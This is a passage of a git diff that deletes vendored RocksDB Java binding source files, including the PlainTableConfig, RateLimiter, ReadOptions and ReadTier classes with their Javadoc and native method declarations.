-  private native long maxSequentialSkipInIterations(long handle);
-  private native void setMemTableFactory(long handle, long factoryHandle);
-  private native String memTableFactoryName(long handle);
-  private native void setTableFactory(long handle, long factoryHandle);
-  private native String tableFactoryName(long handle);
-  private native void setInplaceUpdateSupport(
-      long handle, boolean inplaceUpdateSupport);
-  private native boolean inplaceUpdateSupport(long handle);
-  private native void setInplaceUpdateNumLocks(
-      long handle, long inplaceUpdateNumLocks)
-      throws IllegalArgumentException;
-  private native long inplaceUpdateNumLocks(long handle);
-  private native void setMemtablePrefixBloomSizeRatio(
-      long handle, double memtablePrefixBloomSizeRatio);
-  private native double memtablePrefixBloomSizeRatio(long handle);
-  private native void setBloomLocality(
-      long handle, int bloomLocality);
-  private native int bloomLocality(long handle);
-  private native void setMaxSuccessiveMerges(
-      long handle, long maxSuccessiveMerges)
-      throws IllegalArgumentException;
-  private native long maxSuccessiveMerges(long handle);
-  private native void setOptimizeFiltersForHits(long handle,
-      boolean optimizeFiltersForHits);
-  private native boolean optimizeFiltersForHits(long handle);
-  private native void setMemtableHugePageSize(long handle,
-      long memtableHugePageSize);
-  private native long memtableHugePageSize(long handle);
-  private native void setSoftPendingCompactionBytesLimit(long handle,
-      long softPendingCompactionBytesLimit);
-  private native long softPendingCompactionBytesLimit(long handle);
-  private native void setHardPendingCompactionBytesLimit(long handle,
-      long hardPendingCompactionBytesLimit);
-  private native long hardPendingCompactionBytesLimit(long handle);
-  private native void setLevel0FileNumCompactionTrigger(long handle,
-      int level0FileNumCompactionTrigger);
-  private native int level0FileNumCompactionTrigger(long handle);
-  private native void setLevel0SlowdownWritesTrigger(long handle,
-      int level0SlowdownWritesTrigger);
-  private native int level0SlowdownWritesTrigger(long handle);
-  private native void setLevel0StopWritesTrigger(long handle,
-      int level0StopWritesTrigger);
-  private native int level0StopWritesTrigger(long handle);
-  private native void setMaxBytesForLevelMultiplierAdditional(long handle,
-      int[] maxBytesForLevelMultiplierAdditional);
-  private native int[] maxBytesForLevelMultiplierAdditional(long handle);
-  private native void setParanoidFileChecks(long handle,
-      boolean paranoidFileChecks);
-  private native boolean paranoidFileChecks(long handle);
-  private native void setMaxWriteBufferNumberToMaintain(final long handle,
-      final int maxWriteBufferNumberToMaintain);
-  private native int maxWriteBufferNumberToMaintain(final long handle);
-  private native void setCompactionPriority(final long handle,
-      final byte compactionPriority);
-  private native byte compactionPriority(final long handle);
-  private native void setReportBgIoStats(final long handle,
-      final boolean reportBgIoStats);
-  private native boolean reportBgIoStats(final long handle);
-  private native void setCompactionOptionsUniversal(final long handle,
-      final long compactionOptionsUniversalHandle);
-  private native void setCompactionOptionsFIFO(final long handle,
-      final long compactionOptionsFIFOHandle);
-  private native void setForceConsistencyChecks(final long handle,
-      final boolean forceConsistencyChecks);
-  private native boolean forceConsistencyChecks(final long handle);
-
-  // instance variables
-  private Env env_;
-  private MemTableConfig memTableConfig_;
-  private TableFormatConfig tableFormatConfig_;
-  private RateLimiter rateLimiter_;
-  private AbstractComparator<? extends AbstractSlice<?>> comparator_;
-  private CompactionOptionsUniversal compactionOptionsUniversal_;
-  private CompactionOptionsFIFO compactionOptionsFIFO_;
-  private CompressionOptions compressionOptions_;
-  private Cache rowCache_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/PlainTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/PlainTableConfig.java
deleted file mode 100644
index c099981..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/PlainTableConfig.java
+++ /dev/null
@@ -1,251 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * The config for plain table sst format.
- *
- * <p>PlainTable is a RocksDB's SST file format optimized for low query
- * latency on pure-memory or really low-latency media.</p>
- *
- * <p>It also support prefix hash feature.</p>
- */
-public class PlainTableConfig extends TableFormatConfig {
-  public static final int VARIABLE_LENGTH = 0;
-  public static final int DEFAULT_BLOOM_BITS_PER_KEY = 10;
-  public static final double DEFAULT_HASH_TABLE_RATIO = 0.75;
-  public static final int DEFAULT_INDEX_SPARSENESS = 16;
-  public static final int DEFAULT_HUGE_TLB_SIZE = 0;
-  public static final EncodingType DEFAULT_ENCODING_TYPE =
-      EncodingType.kPlain;
-  public static final boolean DEFAULT_FULL_SCAN_MODE = false;
-  public static final boolean DEFAULT_STORE_INDEX_IN_FILE
-      = false;
-
-  public PlainTableConfig() {
-    keySize_ = VARIABLE_LENGTH;
-    bloomBitsPerKey_ = DEFAULT_BLOOM_BITS_PER_KEY;
-    hashTableRatio_ = DEFAULT_HASH_TABLE_RATIO;
-    indexSparseness_ = DEFAULT_INDEX_SPARSENESS;
-    hugePageTlbSize_ = DEFAULT_HUGE_TLB_SIZE;
-    encodingType_ = DEFAULT_ENCODING_TYPE;
-    fullScanMode_ = DEFAULT_FULL_SCAN_MODE;
-    storeIndexInFile_ = DEFAULT_STORE_INDEX_IN_FILE;
-  }
-
-  /**
-   * <p>Set the length of the user key. If it is set to be
-   * VARIABLE_LENGTH, then it indicates the user keys are
-   * of variable length.</p>
-   *
-   * <p>Otherwise,all the keys need to have the same length
-   * in byte.</p>
-   *
-   * <p>DEFAULT: VARIABLE_LENGTH</p>
-   *
-   * @param keySize the length of the user key.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setKeySize(int keySize) {
-    keySize_ = keySize;
-    return this;
-  }
-
-  /**
-   * @return the specified size of the user key.  If VARIABLE_LENGTH,
-   *     then it indicates variable-length key.
-   */
-  public int keySize() {
-    return keySize_;
-  }
-
-  /**
-   * Set the number of bits per key used by the internal bloom filter
-   * in the plain table sst format.
-   *
-   * @param bitsPerKey the number of bits per key for bloom filer.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setBloomBitsPerKey(int bitsPerKey) {
-    bloomBitsPerKey_ = bitsPerKey;
-    return this;
-  }
-
-  /**
-   * @return the number of bits per key used for the bloom filter.
-   */
-  public int bloomBitsPerKey() {
-    return bloomBitsPerKey_;
-  }
-
-  /**
-   * hashTableRatio is the desired utilization of the hash table used
-   * for prefix hashing.  The ideal ratio would be the number of
-   * prefixes / the number of hash buckets.  If this value is set to
-   * zero, then hash table will not be used.
-   *
-   * @param ratio the hash table ratio.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setHashTableRatio(double ratio) {
-    hashTableRatio_ = ratio;
-    return this;
-  }
-
-  /**
-   * @return the hash table ratio.
-   */
-  public double hashTableRatio() {
-    return hashTableRatio_;
-  }
-
-  /**
-   * Index sparseness determines the index interval for keys inside the
-   * same prefix.  This number is equal to the maximum number of linear
-   * search required after hash and binary search.  If it's set to 0,
-   * then each key will be indexed.
-   *
-   * @param sparseness the index sparseness.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setIndexSparseness(int sparseness) {
-    indexSparseness_ = sparseness;
-    return this;
-  }
-
-  /**
-   * @return the index sparseness.
-   */
-  public long indexSparseness() {
-    return indexSparseness_;
-  }
-
-  /**
-   * <p>huge_page_tlb_size: if &le;0, allocate hash indexes and blooms
-   * from malloc otherwise from huge page TLB.</p>
-   *
-   * <p>The user needs to reserve huge pages for it to be allocated,
-   * like: {@code sysctl -w vm.nr_hugepages=20}</p>
-   *
-   * <p>See linux doc Documentation/vm/hugetlbpage.txt</p>
-   *
-   * @param hugePageTlbSize huge page tlb size
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setHugePageTlbSize(int hugePageTlbSize) {
-    this.hugePageTlbSize_ = hugePageTlbSize;
-    return this;
-  }
-
-  /**
-   * Returns the value for huge page tlb size
-   *
-   * @return hugePageTlbSize
-   */
-  public int hugePageTlbSize() {
-    return hugePageTlbSize_;
-  }
-
-  /**
-   * Sets the encoding type.
-   *
-   * <p>This setting determines how to encode
-   * the keys. See enum {@link EncodingType} for
-   * the choices.</p>
-   *
-   * <p>The value will determine how to encode keys
-   * when writing to a new SST file. This value will be stored
-   * inside the SST file which will be used when reading from
-   * the file, which makes it possible for users to choose
-   * different encoding type when reopening a DB. Files with
-   * different encoding types can co-exist in the same DB and
-   * can be read.</p>
-   *
-   * @param encodingType {@link org.rocksdb.EncodingType} value.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setEncodingType(EncodingType encodingType) {
-    this.encodingType_ = encodingType;
-    return this;
-  }
-
-  /**
-   * Returns the active EncodingType
-   *
-   * @return currently set encoding type
-   */
-  public EncodingType encodingType() {
-    return encodingType_;
-  }
-
-  /**
-   * Set full scan mode, if true the whole file will be read
-   * one record by one without using the index.
-   *
-   * @param fullScanMode boolean value indicating if full
-   *     scan mode shall be enabled.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setFullScanMode(boolean fullScanMode) {
-    this.fullScanMode_ = fullScanMode;
-    return this;
-  }
-
-  /**
-   * Return if full scan mode is active
-   * @return boolean value indicating if the full scan mode is
-   *     enabled.
-   */
-  public boolean fullScanMode() {
-    return fullScanMode_;
-  }
-
-  /**
-   * <p>If set to true: compute plain table index and bloom
-   * filter during file building and store it in file.
-   * When reading file, index will be mmaped instead
-   * of doing recomputation.</p>
-   *
-   * @param storeIndexInFile value indicating if index shall
-   *     be stored in a file
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setStoreIndexInFile(boolean storeIndexInFile) {
-    this.storeIndexInFile_ = storeIndexInFile;
-    return this;
-  }
-
-  /**
-   * Return a boolean value indicating if index shall be stored
-   * in a file.
-   *
-   * @return currently set value for store index in file.
-   */
-  public boolean storeIndexInFile() {
-    return storeIndexInFile_;
-  }
-
-  @Override protected long newTableFactoryHandle() {
-    return newTableFactoryHandle(keySize_, bloomBitsPerKey_,
-        hashTableRatio_, indexSparseness_, hugePageTlbSize_,
-        encodingType_.getValue(), fullScanMode_,
-        storeIndexInFile_);
-  }
-
-  private native long newTableFactoryHandle(
-      int keySize, int bloomBitsPerKey,
-      double hashTableRatio, int indexSparseness,
-      int hugePageTlbSize, byte encodingType,
-      boolean fullScanMode, boolean storeIndexInFile);
-
-  private int keySize_;
-  private int bloomBitsPerKey_;
-  private double hashTableRatio_;
-  private int indexSparseness_;
-  private int hugePageTlbSize_;
-  private EncodingType encodingType_;
-  private boolean fullScanMode_;
-  private boolean storeIndexInFile_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RateLimiter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RateLimiter.java
deleted file mode 100644
index fc23887..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RateLimiter.java
+++ /dev/null
@@ -1,119 +0,0 @@
-// Copyright (c) 2015, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RateLimiter, which is used to control write rate of flush and
- * compaction.
- *
- * @since 3.10.0
- */
-public class RateLimiter extends RocksObject {
-  private static final long DEFAULT_REFILL_PERIOD_MICROS = (100 * 1000);
-  private static final int DEFAULT_FAIRNESS = 10;
-
-  /**
-   * RateLimiter constructor
-   *
-   * @param rateBytesPerSecond this is the only parameter you want to set
-   *     most of the time. It controls the total write rate of compaction
-   *     and flush in bytes per second. Currently, RocksDB does not enforce
-   *     rate limit for anything other than flush and compaction, e.g. write to WAL.
-   * @param refillPeriodMicros this controls how often tokens are refilled. For example,
-   *     when rate_bytes_per_sec is set to 10MB/s and refill_period_us is set to
-   *     100ms, then 1MB is refilled every 100ms internally. Larger value can lead to
-   *     burstier writes while smaller value introduces more CPU overhead.
-   *     The default should work for most cases.
-   * @param fairness RateLimiter accepts high-pri requests and low-pri requests.
-   *     A low-pri request is usually blocked in favor of hi-pri request. Currently,
-   *     RocksDB assigns low-pri to request from compaction and high-pri to request
-   *     from flush. Low-pri requests can get blocked if flush requests come in
-   *     continuously. This fairness parameter grants low-pri requests permission by
-   *     fairness chance even though high-pri requests exist to avoid starvation.
-   *     You should be good by leaving it at default 10.
-   */
-  public RateLimiter(final long rateBytesPerSecond,
-      final long refillPeriodMicros, final int fairness) {
-    super(newRateLimiterHandle(rateBytesPerSecond,
-        refillPeriodMicros, fairness));
-  }
-
-  /**
-   * RateLimiter constructor
-   *
-   * @param rateBytesPerSecond this is the only parameter you want to set
-   *     most of the time. It controls the total write rate of compaction
-   *     and flush in bytes per second. Currently, RocksDB does not enforce
-   *     rate limit for anything other than flush and compaction, e.g. write to WAL.
-   */
-  public RateLimiter(final long rateBytesPerSecond) {
-    this(rateBytesPerSecond, DEFAULT_REFILL_PERIOD_MICROS, DEFAULT_FAIRNESS);
-  }
-
-  /**
-   * <p>This API allows user to dynamically change rate limiter's bytes per second.
-   * REQUIRED: bytes_per_second &gt; 0</p>
-   *
-   * @param bytesPerSecond bytes per second.
-   */
-  public void setBytesPerSecond(final long bytesPerSecond) {
-    assert(isOwningHandle());
-    setBytesPerSecond(nativeHandle_, bytesPerSecond);
-  }
-
-  /**
-   * <p>Request for token to write bytes. If this request can not be satisfied,
-   * the call is blocked. Caller is responsible to make sure
-   * {@code bytes &lt; GetSingleBurstBytes()}.</p>
-   *
-   * @param bytes requested bytes.
-   */
-  public void request(final long bytes) {
-    assert(isOwningHandle());
-    request(nativeHandle_, bytes);
-  }
-
-  /**
-   * <p>Max bytes can be granted in a single burst.</p>
-   *
-   * @return max bytes can be granted in a single burst.
-   */
-  public long getSingleBurstBytes() {
-    assert(isOwningHandle());
-    return getSingleBurstBytes(nativeHandle_);
-  }
-
-  /**
-   * <p>Total bytes that go though rate limiter.</p>
-   *
-   * @return total bytes that go though rate limiter.
-   */
-  public long getTotalBytesThrough() {
-    assert(isOwningHandle());
-    return getTotalBytesThrough(nativeHandle_);
-  }
-
-  /**
-   * <p>Total # of requests that go though rate limiter.</p>
-   *
-   * @return total # of requests that go though rate limiter.
-   */
-  public long getTotalRequests() {
-    assert(isOwningHandle());
-    return getTotalRequests(nativeHandle_);
-  }
-
-  private static native long newRateLimiterHandle(final long rateBytesPerSecond,
-      final long refillPeriodMicros, final int fairness);
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void setBytesPerSecond(final long handle,
-      final long bytesPerSecond);
-  private native void request(final long handle, final long bytes);
-  private native long getSingleBurstBytes(final long handle);
-  private native long getTotalBytesThrough(final long handle);
-  private native long getTotalRequests(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadOptions.java
deleted file mode 100644
index 9d7b999..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadOptions.java
+++ /dev/null
@@ -1,397 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * The class that controls the get behavior.
- *
- * Note that dispose() must be called before an Options instance
- * become out-of-scope to release the allocated memory in c++.
- */
-public class ReadOptions extends RocksObject {
-  public ReadOptions() {
-    super(newReadOptions());
-  }
-
-  /**
-   * If true, all data read from underlying storage will be
-   * verified against corresponding checksums.
-   * Default: true
-   *
-   * @return true if checksum verification is on.
-   */
-  public boolean verifyChecksums() {
-    assert(isOwningHandle());
-    return verifyChecksums(nativeHandle_);
-  }
-
-  /**
-   * If true, all data read from underlying storage will be
-   * verified against corresponding checksums.
-   * Default: true
-   *
-   * @param verifyChecksums if true, then checksum verification
-   *     will be performed on every read.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setVerifyChecksums(
-      final boolean verifyChecksums) {
-    assert(isOwningHandle());
-    setVerifyChecksums(nativeHandle_, verifyChecksums);
-    return this;
-  }
-
-  // TODO(yhchiang): this option seems to be block-based table only.
-  //                 move this to a better place?
-  /**
-   * Fill the cache when loading the block-based sst formated db.
-   * Callers may wish to set this field to false for bulk scans.
-   * Default: true
-   *
-   * @return true if the fill-cache behavior is on.
-   */
-  public boolean fillCache() {
-    assert(isOwningHandle());
-    return fillCache(nativeHandle_);
-  }
-
-  /**
-   * Fill the cache when loading the block-based sst formatted db.
-   * Callers may wish to set this field to false for bulk scans.
-   * Default: true
-   *
-   * @param fillCache if true, then fill-cache behavior will be
-   *     performed.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setFillCache(final boolean fillCache) {
-    assert(isOwningHandle());
-    setFillCache(nativeHandle_, fillCache);
-    return this;
-  }
-
-  /**
-   * Returns the currently assigned Snapshot instance.
-   *
-   * @return the Snapshot assigned to this instance. If no Snapshot
-   *     is assigned null.
-   */
-  public Snapshot snapshot() {
-    assert(isOwningHandle());
-    long snapshotHandle = snapshot(nativeHandle_);
-    if (snapshotHandle != 0) {
-      return new Snapshot(snapshotHandle);
-    }
-    return null;
-  }
-
-  /**
-   * <p>If "snapshot" is non-nullptr, read as of the supplied snapshot
-   * (which must belong to the DB that is being read and which must
-   * not have been released).  If "snapshot" is nullptr, use an implicit
-   * snapshot of the state at the beginning of this read operation.</p>
-   * <p>Default: null</p>
-   *
-   * @param snapshot {@link Snapshot} instance
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setSnapshot(final Snapshot snapshot) {
-    assert(isOwningHandle());
-    if (snapshot != null) {
-      setSnapshot(nativeHandle_, snapshot.nativeHandle_);
-    } else {
-      setSnapshot(nativeHandle_, 0l);
-    }
-    return this;
-  }
-
-  /**
-   * Returns the current read tier.
-   *
-   * @return the read tier in use, by default {@link ReadTier#READ_ALL_TIER}
-   */
-  public ReadTier readTier() {
-    assert(isOwningHandle());
-    return ReadTier.getReadTier(readTier(nativeHandle_));
-  }
-
-  /**
-   * Specify if this read request should process data that ALREADY
-   * resides on a particular cache. If the required data is not
-   * found at the specified cache, then {@link RocksDBException} is thrown.
-   *
-   * @param readTier {@link ReadTier} instance
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setReadTier(final ReadTier readTier) {
-    assert(isOwningHandle());
-    setReadTier(nativeHandle_, readTier.getValue());
-    return this;
-  }
-
-  /**
-   * Specify to create a tailing iterator -- a special iterator that has a
-   * view of the complete database (i.e. it can also be used to read newly
-   * added data) and is optimized for sequential reads. It will return records
-   * that were inserted into the database after the creation of the iterator.
-   * Default: false
-   *
-   * Not supported in {@code ROCKSDB_LITE} mode!
-   *
-   * @return true if tailing iterator is enabled.
-   */
-  public boolean tailing() {
-    assert(isOwningHandle());
-    return tailing(nativeHandle_);
-  }
-
-  /**
-   * Specify to create a tailing iterator -- a special iterator that has a
-   * view of the complete database (i.e. it can also be used to read newly
-   * added data) and is optimized for sequential reads. It will return records
-   * that were inserted into the database after the creation of the iterator.
-   * Default: false
-   * Not supported in ROCKSDB_LITE mode!
-   *
-   * @param tailing if true, then tailing iterator will be enabled.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setTailing(final boolean tailing) {
-    assert(isOwningHandle());
-    setTailing(nativeHandle_, tailing);
-    return this;
-  }
-
-  /**
-   * Returns whether managed iterators will be used.
-   *
-   * @return the setting of whether managed iterators will be used, by default false
-   */
-  public boolean managed() {
-    assert(isOwningHandle());
-    return managed(nativeHandle_);
-  }
-
-  /**
-   * Specify to create a managed iterator -- a special iterator that
-   * uses less resources by having the ability to free its underlying
-   * resources on request.
-   *
-   * @param managed if true, then managed iterators will be enabled.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setManaged(final boolean managed) {
-    assert(isOwningHandle());
-    setManaged(nativeHandle_, managed);
-    return this;
-  }
-
-  /**
-   * Returns whether a total seek order will be used
-   *
-   * @return the setting of whether a total seek order will be used
-   */
-  public boolean totalOrderSeek() {
-    assert(isOwningHandle());
-    return totalOrderSeek(nativeHandle_);
-  }
-
-  /**
-   * Enable a total order seek regardless of index format (e.g. hash index)
-   * used in the table. Some table format (e.g. plain table) may not support
-   * this option.
-   *
-   * @param totalOrderSeek if true, then total order seek will be enabled.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setTotalOrderSeek(final boolean totalOrderSeek) {
-    assert(isOwningHandle());
-    setTotalOrderSeek(nativeHandle_, totalOrderSeek);
-    return this;
-  }
-
-  /**
-   * Returns whether the iterator only iterates over the same prefix as the seek
-   *
-   * @return the setting of whether the iterator only iterates over the same
-   *   prefix as the seek, default is false
-   */
-  public boolean prefixSameAsStart() {
-    assert(isOwningHandle());
-    return prefixSameAsStart(nativeHandle_);
-  }
-
-
-  /**
-   * Enforce that the iterator only iterates over the same prefix as the seek.
-   * This option is effective only for prefix seeks, i.e. prefix_extractor is
-   * non-null for the column family and {@link #totalOrderSeek()} is false.
-   * Unlike iterate_upper_bound, {@link #setPrefixSameAsStart(boolean)} only
-   * works within a prefix but in both directions.
-   *
-   * @param prefixSameAsStart if true, then the iterator only iterates over the
-   *   same prefix as the seek
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setPrefixSameAsStart(final boolean prefixSameAsStart) {
-    assert(isOwningHandle());
-    setPrefixSameAsStart(nativeHandle_, prefixSameAsStart);
-    return this;
-  }
-
-  /**
-   * Returns whether the blocks loaded by the iterator will be pinned in memory
-   *
-   * @return the setting of whether the blocks loaded by the iterator will be
-   *   pinned in memory
-   */
-  public boolean pinData() {
-    assert(isOwningHandle());
-    return pinData(nativeHandle_);
-  }
-
-  /**
-   * Keep the blocks loaded by the iterator pinned in memory as long as the
-   * iterator is not deleted, If used when reading from tables created with
-   * BlockBasedTableOptions::use_delta_encoding = false,
-   * Iterator's property "rocksdb.iterator.is-key-pinned" is guaranteed to
-   * return 1.
-   *
-   * @param pinData if true, the blocks loaded by the iterator will be pinned
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setPinData(final boolean pinData) {
-    assert(isOwningHandle());
-    setPinData(nativeHandle_, pinData);
-    return this;
-  }
-
-  /**
-   * If true, when PurgeObsoleteFile is called in CleanupIteratorState, we
-   * schedule a background job in the flush job queue and delete obsolete files
-   * in background.
-   *
-   * Default: false
-   *
-   * @return true when PurgeObsoleteFile is called in CleanupIteratorState
-   */
-  public boolean backgroundPurgeOnIteratorCleanup() {
-    assert(isOwningHandle());
-    return backgroundPurgeOnIteratorCleanup(nativeHandle_);
-  }
-
-  /**
-   * If true, when PurgeObsoleteFile is called in CleanupIteratorState, we
-   * schedule a background job in the flush job queue and delete obsolete files
-   * in background.
-   *
-   * Default: false
-   *
-   * @param backgroundPurgeOnIteratorCleanup true when PurgeObsoleteFile is
-   *     called in CleanupIteratorState
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setBackgroundPurgeOnIteratorCleanup(
-      final boolean backgroundPurgeOnIteratorCleanup) {
-    assert(isOwningHandle());
-    setBackgroundPurgeOnIteratorCleanup(nativeHandle_,
-        backgroundPurgeOnIteratorCleanup);
-    return this;
-  }
-
-  /**
-   * If non-zero, NewIterator will create a new table reader which
-   * performs reads of the given size. Using a large size (&gt; 2MB) can
-   * improve the performance of forward iteration on spinning disks.
-   *
-   * Default: 0
-   *
-   * @return The readahead size is bytes
-   */
-  public long readaheadSize() {
-    assert(isOwningHandle());
-    return readaheadSize(nativeHandle_);
-  }
-
-  /**
-   * If non-zero, NewIterator will create a new table reader which
-   * performs reads of the given size. Using a large size (&gt; 2MB) can
-   * improve the performance of forward iteration on spinning disks.
-   *
-   * Default: 0
-   *
-   * @param readaheadSize The readahead size is bytes
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setReadaheadSize(final long readaheadSize) {
-    assert(isOwningHandle());
-    setReadaheadSize(nativeHandle_, readaheadSize);
-    return this;
-  }
-
-  /**
-   * If true, keys deleted using the DeleteRange() API will be visible to
-   * readers until they are naturally deleted during compaction. This improves
-   * read performance in DBs with many range deletions.
-   *
-   * Default: false
-   *
-   * @return true if keys deleted using the DeleteRange() API will be visible
-   */
-  public boolean ignoreRangeDeletions() {
-    assert(isOwningHandle());
-    return ignoreRangeDeletions(nativeHandle_);
-  }
-
-  /**
-   * If true, keys deleted using the DeleteRange() API will be visible to
-   * readers until they are naturally deleted during compaction. This improves
-   * read performance in DBs with many range deletions.
-   *
-   * Default: false
-   *
-   * @param ignoreRangeDeletions true if keys deleted using the DeleteRange()
-   *     API should be visible
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setIgnoreRangeDeletions(final boolean ignoreRangeDeletions) {
-    assert(isOwningHandle());
-    setIgnoreRangeDeletions(nativeHandle_, ignoreRangeDeletions);
-    return this;
-  }
-
-  private native static long newReadOptions();
-  private native boolean verifyChecksums(long handle);
-  private native void setVerifyChecksums(long handle, boolean verifyChecksums);
-  private native boolean fillCache(long handle);
-  private native void setFillCache(long handle, boolean fillCache);
-  private native long snapshot(long handle);
-  private native void setSnapshot(long handle, long snapshotHandle);
-  private native byte readTier(long handle);
-  private native void setReadTier(long handle, byte readTierValue);
-  private native boolean tailing(long handle);
-  private native void setTailing(long handle, boolean tailing);
-  private native boolean managed(long handle);
-  private native void setManaged(long handle, boolean managed);
-  private native boolean totalOrderSeek(long handle);
-  private native void setTotalOrderSeek(long handle, boolean totalOrderSeek);
-  private native boolean prefixSameAsStart(long handle);
-  private native void setPrefixSameAsStart(long handle, boolean prefixSameAsStart);
-  private native boolean pinData(long handle);
-  private native void setPinData(long handle, boolean pinData);
-  private native boolean backgroundPurgeOnIteratorCleanup(final long handle);
-  private native void setBackgroundPurgeOnIteratorCleanup(final long handle,
-      final boolean backgroundPurgeOnIteratorCleanup);
-  private native long readaheadSize(final long handle);
-  private native void setReadaheadSize(final long handle,
-      final long readaheadSize);
-  private native boolean ignoreRangeDeletions(final long handle);
-  private native void setIgnoreRangeDeletions(final long handle,
-      final boolean ignoreRangeDeletions);
-
-  @Override protected final native void disposeInternal(final long handle);
-
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadTier.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadTier.java
deleted file mode 100644
index 6dc76c5..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadTier.java
+++ /dev/null
@@ -1,48 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RocksDB {@link ReadOptions} read tiers.
- */
-public enum ReadTier {
-  READ_ALL_TIER((byte)0),
-  BLOCK_CACHE_TIER((byte)1),
-  PERSISTED_TIER((byte)2);
-
-  private final byte value;
-
-  ReadTier(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * Get ReadTier by byte value.
-   *
-   * @param value byte representation of ReadTier.
-   *
-   * @return {@link org.rocksdb.ReadTier} instance or null.
-   * @throws java.lang.IllegalArgumentException if an invalid
-   *     value is provided.
-   */
-  public static ReadTier getReadTier(final byte value) {
-    for (final ReadTier readTier : ReadTier.values()) {
-      if (readTier.getValue() == value){
-        return readTier;
-      }
-    }
-    throw new IllegalArgumentException("Illegal value provided for ReadTier.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java
deleted file mode 100644
index 6ee81d8..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java
+++ /dev/null
@@ -1,18 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Just a Java wrapper around EmptyValueCompactionFilter implemented in C++
- */
-public class RemoveEmptyValueCompactionFilter
-    extends AbstractCompactionFilter<Slice> {
-  public RemoveEmptyValueCompactionFilter() {
-    super(createNewRemoveEmptyValueCompactionFilter0());
-  }
-
-  private native static long createNewRemoveEmptyValueCompactionFilter0();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RestoreOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RestoreOptions.java
deleted file mode 100644
index 94d93fc..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RestoreOptions.java
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RestoreOptions to control the behavior of restore.
- *
- * Note that dispose() must be called before this instance become out-of-scope
- * to release the allocated memory in c++.
- *
- */
-public class RestoreOptions extends RocksObject {
-  /**
-   * Constructor
-   *
-   * @param keepLogFiles If true, restore won't overwrite the existing log files
-   *   in wal_dir. It will also move all log files from archive directory to
-   *   wal_dir. Use this option in combination with
-   *   BackupableDBOptions::backup_log_files = false for persisting in-memory
-   *   databases.
-   *   Default: false
-   */
-  public RestoreOptions(final boolean keepLogFiles) {
-    super(newRestoreOptions(keepLogFiles));
-  }
-
-  private native static long newRestoreOptions(boolean keepLogFiles);
-  @Override protected final native void disposeInternal(final long handle);
-}
